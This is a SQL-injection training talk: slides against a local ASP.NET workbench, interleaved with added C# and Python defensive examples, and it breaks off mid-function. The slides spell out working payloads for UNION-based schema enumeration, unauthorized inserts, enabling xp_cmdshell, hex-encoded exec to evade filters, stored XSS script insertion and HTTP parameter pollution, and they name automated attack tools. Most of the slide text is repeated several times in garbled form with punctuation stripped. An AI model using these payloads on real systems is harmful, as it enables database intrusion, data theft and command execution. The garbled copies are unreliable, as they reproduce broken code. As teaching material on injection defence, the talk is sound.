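            f.Reasons.Add("non-space whitespace (tab, LF, VT, FF, CR or NBSP) inside the value");

        f.Canonical = decoded;
        return f;
    }

    public static void Main()
    {
        // Query strings constructed from the talk's URLs, plus one ordinary search.
        string[] samples =
        {
            "search=bike%2527%20or%201%3D1%2D%2D",
            "search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
            "search=prevention%2527%20union%20select%2F%2A&search=%2A%2F%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D",
            "search=mountain+bikes",
        };
        foreach (string s in samples)
        {
            Finding f = Inspect(s, "search");
            Console.WriteLine("canonical: " + f.Canonical.Replace("\t", "<TAB>"));
            Console.WriteLine("  " + (f.Reasons.Count == 0 ? "nothing unusual" : string.Join("; ", f.Reasons)));
        }
    }
}
```

The third sample reports both pollution and double encoding, and its canonical form is the "select /*,*/ table_schema…" string the slide describes; the plain "mountain bikes" search reports nothing, which is the behaviour you want from a check that only feeds logging and alerting.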
Doing It Right: Parameterized Queries
• The right way to do it
  – All parameters created using SqlParameter
  – Not necessary to use stored procedures, though in SQL Server this is preferable
• Stored Procedure-Driven Test: not susceptible to SQL injection. You are safe from this issue
• Secure Query-Driven Test: not susceptible either
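The naïve SqlDataReader lookup from the start of the talk beside the SqlParameter version the slide calls for, as an added example (not code from the talk or its workbench). It assumes the 2012-era System.Data.SqlClient namespace, an AdventureWorks-style Production.ProductSubcategory table whose Name column is nvarchar(50), a connection string in the CONN_STR environment variable, and a stored procedure named Production.SearchSubcategory with one @Filter parameter (that procedure name is hypothetical).

```csharp
// Added example: string concatenation versus typed parameters in ADO.NET.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

public static class SubcategorySearch
{
    // BEFORE: the text-box value is spliced into the SQL text, so an input such as
    // f' OR 1 = 1-- rewrites the WHERE clause instead of being searched for.
    public static List<string> SearchNaive(string connStr, string filter)
    {
        string sql = "select Name from Production.ProductSubcategory where Name like '" + filter + "'";
        return Run(connStr, sql, cmd => { });
    }

    // AFTER: the SQL text never changes; the input travels as a typed parameter value,
    // so quotes and comment markers inside it are data, not syntax. Same shape as the
    // talk's sp_executesql example, just done from the client side.
    public static List<string> SearchParameterized(string connStr, string filter)
    {
        const string sql = "select Name from Production.ProductSubcategory where Name like @Filter";
        return Run(connStr, sql, cmd =>
        {
            // Size the parameter to the column (assumed nvarchar(50)). Longer input is
            // truncated rather than sent verbatim, so also enforce the length in the UI,
            // as the talk's "understand your data domain" advice says.
            cmd.Parameters.Add("@Filter", SqlDbType.NVarChar, 50).Value = filter;
        });
    }

    // Stored-procedure variant: CommandType.StoredProcedure makes the driver issue an
    // RPC call with typed parameters rather than building an EXEC string.
    public static List<string> SearchViaProcedure(string connStr, string filter)
    {
        return Run(connStr, "Production.SearchSubcategory", cmd =>
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@Filter", SqlDbType.NVarChar, 50).Value = filter;
        });
    }

    // Shared plumbing: open, bind parameters, read the Name column back.
    private static List<string> Run(string connStr, string commandText, Action<SqlCommand> bind)
    {
        var names = new List<string>();
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(commandText, conn))
        {
            bind(cmd);
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                    names.Add(reader.GetString(0));
            }
        }
        return names;
    }

    public static void Main()
    {
        string connStr = Environment.GetEnvironmentVariable("CONN_STR");
        // With the talk's first probe as input, the parameterized query looks for a
        // subcategory literally named "f' OR 1 = 1--" and returns no rows; the naive
        // version would have returned every row.
        string probe = "f' OR 1 = 1--";
        Console.WriteLine("parameterized: {0} row(s)", SearchParameterized(connStr, probe).Count);
        Console.WriteLine("via procedure: {0} row(s)", SearchViaProcedure(connStr, probe).Count);
    }
}
```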
Adding Dynamic SQL Into The Mix
• Basic insecure dynamic SP:
  create procedure BadProc
    @Filter nvarchar(500)
  as
    declare @sql varchar(250)
    set @sql = 'select * from table where Name like ''' + @Filter + ''''
    exec(@sql)
• The basic problem is the same as in the query-driven injection example: @Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
• Easy to perform attacks on unprotected dynamic stored procedures from SSMS
• exec BadProc @Filter = 'SHOOOO'' UNION select TABLE_SCHEMA + ''.'' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--'
• Parameterized queries prevent this from being an issue in ASP.NET
Protecting Your Dynamic SPs
• Use sp_executesql
  – Could also use a combo of QUOTENAME and REPLACE
• Include the parameter as a parameter inside the SQL to run
• Example:
  declare @sql nvarchar(max)
  set @sql = 'select ProductSubcategoryID, ProductCategoryID, Name from Production.ProductSubcategory where Name like @Filter'
  exec sp_executesql @sql, N'@Filter varchar(200)', @Filter
• Once you do this, you are completely safe from SQL injection
Recap: What To Do
• Parameterize your queries
  – Use SqlParameter to handle input in ASP.NET
  – Use sp_executesql correctly when you do use dynamic SQL
• Understand your data domain
  – Correct data sizes (not too large)
  – Input field has correct length
  – Regular expressions for well-defined field types (e.g. phone number, Social Security Number)
• Blacklists usually don't work, but whitelists can
• Create limited-access accounts for web applications
• Constraints in UI, business objects, and database
  – Defense in depth
  – This isn't really a violation of DRY
  – If I can beat two of your three checks, the third could still stop me
Next Steps
• Automation
  – Havij (most popular, easy GUI)
  – Sqlmap (my favorite)
  – BSQL Hacker (blind SQL injection)
  – BBQSQL (Python-based blind SQL injection)
  – Fast-Track (Metasploit module)
  – Plenty more where this came from
• Really evil stuff
Q&A
Kevin Feasel feaselkl@gmail.com
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
• Use sp_executesql
  – Could also use a combo of QUOTENAME and REPLACE
• Include the parameter as a parameter inside the SQL to run
• Example:

    declare @sql nvarchar(max)
    set @sql = 'select ProductSubcategoryID, ProductCategoryID, Name from Production.ProductSubcategory where Name like @Filter'
    exec sp_executesql @sql, N'@Filter varchar(200)', @Filter

• Once you do this, you are completely safe from SQL injection
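The BadProc pattern beside its parameterized replacement, added here as an example rather than the slides' own T-SQL. SQLite stands in for SQL Server (it has no INFORMATION_SCHEMA, so the slide's payload is re-pointed at sqlite_master), a `?` placeholder plays the part of sp_executesql's @Filter parameter, and the table rows are constructed.

```python
"""
BadProc beside its parameterized replacement, added here as an example rather
than the slides' T-SQL. SQLite stands in for SQL Server: it has no
INFORMATION_SCHEMA, so the slide's payload is re-pointed at sqlite_master,
and a ? placeholder plays the part of sp_executesql's @Filter parameter.
"""
import sqlite3

# Constructed rows standing in for Production.ProductSubcategory.
SUBCATEGORIES = [(1, 1, "Mountain Bikes"), (2, 1, "Road Bikes"), (3, 2, "Helmets")]

# The SSMS payload from the slides, with sqlite_master in place of
# INFORMATION_SCHEMA.TABLES and || in place of + for string concatenation.
PAYLOAD = "SHOOOO' UNION select type || '.' || name, 1, 1 from sqlite_master--"

COLUMNS = "select ProductSubcategoryID, ProductCategoryID, Name from ProductSubcategory "


def setup():
    """In-memory database with the constructed subcategory rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ProductSubcategory "
                 "(ProductSubcategoryID integer, ProductCategoryID integer, Name text)")
    conn.executemany("insert into ProductSubcategory values (?, ?, ?)", SUBCATEGORIES)
    return conn


def bad_proc(conn, filter_value):
    """Mirror of BadProc: set @sql = '... like ''' + @Filter + ''''; exec(@sql).
    The filter text is parsed as SQL, so a quote inside it ends the literal."""
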